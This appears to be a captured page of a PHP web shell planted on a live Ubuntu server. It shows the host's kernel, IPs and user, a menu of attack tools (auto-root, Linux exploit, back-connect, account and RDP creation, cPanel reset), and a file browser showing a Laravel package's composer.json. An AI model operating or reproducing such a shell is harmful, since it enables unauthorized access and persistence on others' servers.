Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api-8 /
vendor /
fideloper /
proxy /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
LICENSE.md
1.01
KB
-rwxrwxr-x
composer.json
876
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "fideloper/proxy", "description": "Set trusted proxies for Laravel", "keywords": ["proxy", "trusted proxy", "load balancing"], "license": "MIT", "authors": [ { "name": "Chris Fidao", "email": "fideloper@gmail.com" } ], "require": { "php": ">=5.4.0", "illuminate/contracts": "^5.0|^6.0|^7.0|^8.0|^9.0" }, "require-dev": { "illuminate/http": "^5.0|^6.0|^7.0|^8.0|^9.0", "mockery/mockery": "^1.0", "phpunit/phpunit": "^8.5.8|^9.3.3" }, "autoload": { "psr-4": { "Fideloper\\Proxy\\": "src/" } }, "extra": { "laravel": { "providers": [ "Fideloper\\Proxy\\TrustedProxyServiceProvider" ] } }, "minimum-stability": "dev", "prefer-stable": true }
Close